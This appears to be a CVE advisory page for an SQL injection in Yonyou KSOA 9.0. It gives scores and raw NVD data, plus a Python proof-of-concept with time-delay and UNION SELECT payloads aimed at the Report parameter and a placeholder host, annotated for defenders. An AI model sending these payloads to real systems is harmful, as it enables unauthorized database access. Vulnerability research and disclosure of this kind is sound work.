Security Vulnerability Report
CVE-2025-15436 CVSS 7.3 HIGH

CVE-2025-15436

Published: 2026-01-02 08:15:42
Last Modified: 2026-04-29 01:00:02

Description

A vulnerability has been found in Yonyou KSOA 9.0. It affects an unknown function of the file /worksheet/work_edit.jsp. Manipulating the argument Report leads to SQL injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score
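7.3 (CVSS 3.1, from the record's "Secondary" source; the raw record below also carries a "Primary" CVSS 3.1 score of 9.8 CRITICAL and a CVSS 4.0 score of 5.5 MEDIUM)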
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:yonyou:ksoa:9.0:*:*:*:*:*:*:* - VULNERABLE
Yonyou KSOA 9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
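import requests
import sys

# CVE-2025-15436: SQL injection check for Yonyou KSOA 9.0
# Endpoint:  /worksheet/work_edit.jsp
# Parameter: Report
#
# Reviewer notes for defenders:
# - Both payloads below travel as the `Report` query-string parameter of a GET
#   request, so web-server / WAF logs for this path that contain a quote
#   followed by SQL keywords (SLEEP, UNION SELECT) are the signal to alert on.
# - The payloads use MySQL-style functions (SLEEP, database(), user(),
#   version()). The advisory does not state which DBMS backs KSOA 9.0, so a
#   negative result from this script is NOT evidence that a host is unaffected.
# - No vendor fix is referenced in the CVE record; until one exists, restrict
#   network access to the endpoint and bind the parameter server-side.
#
# The host is a reserved, non-resolvable placeholder (RFC 2606 `.invalid`).
# The previously used "target.com" is a real registered domain, so running the
# script unmodified would have sent injection strings to a third party.
target_url = "http://ksoa-lab.example.invalid/worksheet/work_edit.jsp"


def check_vulnerability():
    """Send a baseline and a time-delay request and report whether the delay fired.

    Returns:
        True if the second response took more than 4 seconds, otherwise False.
        Any exception raised while sending the requests is printed and also
        yields False.

    Limitations:
        The baseline response is requested but never compared against, so a
        slow or loaded server can push the second request past the 4-second
        threshold and produce a false positive. Treat a True result as a lead
        to verify, not as confirmation.
    """
    baseline_query = {"Report": "1"}
    # Conditional time delay: the 5-second sleep only runs if the quote breaks
    # out of the original SQL string and the injected expression is evaluated.
    delay_payload = "1' AND (SELECT CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END) AND '1'='1"
    delay_query = {"Report": delay_payload}

    try:
        print("[*] Sending normal request...")
        # Sent for parity with the original flow; its timing is not used.
        requests.get(target_url, params=baseline_query, timeout=10)

        print("[*] Sending malicious payload...")
        delayed = requests.get(target_url, params=delay_query, timeout=15)
    except Exception as exc:  # best-effort: report and treat as "not confirmed"
        print(f"[-] Error: {exc}")
        return False

    if delayed.elapsed.total_seconds() > 4:
        print("[+] SQL Injection vulnerability confirmed!")
        return True

    print("[-] Vulnerability check failed or target not vulnerable")
    return False


def extract_database():
    """Send a UNION-based request and print the status and a response preview.

    Nothing is parsed: the function prints the HTTP status code and, when the
    body is non-empty, its first 500 characters. The four-column UNION is a
    guess at the original query's column count; if it does not match, the
    server will simply return an error page and the preview shows that instead.
    """
    union_payload = "1' UNION SELECT NULL,database(),user(),version()-- -"

    try:
        reply = requests.get(target_url, params={"Report": union_payload}, timeout=10)
    except Exception as exc:  # best-effort: report and return
        print(f"[-] Error: {exc}")
        return

    print(f"[*] Response status: {reply.status_code}")
    if reply.text:
        print(f"[*] Response preview: {reply.text[:500]}")


if __name__ == "__main__":
    print("CVE-2025-15436 SQL Injection PoC")
    print("Target: Yonyou KSOA 9.0")
    print("=" * 50)

    # The enumeration request is only sent after the timing check reports True.
    if check_vulnerability():
        print("\n[*] Attempting database enumeration...")
        extract_database()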

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15436", "sourceIdentifier": "[email protected]", "published": "2026-01-02T08:15:41.550", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in Yonyou KSOA 9.0. Affected by this issue is some unknown functionality of the file /worksheet/work_edit.jsp. Such manipulation of the argument Report leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", 
"Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:a:yonyou:ksoa:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "16092315-0438-4B91-A293-8CE177EAD656"}]}]}], "references": [{"url": "https://github.com/xinshou-test/CVE/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.339363", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.339363", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721925", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}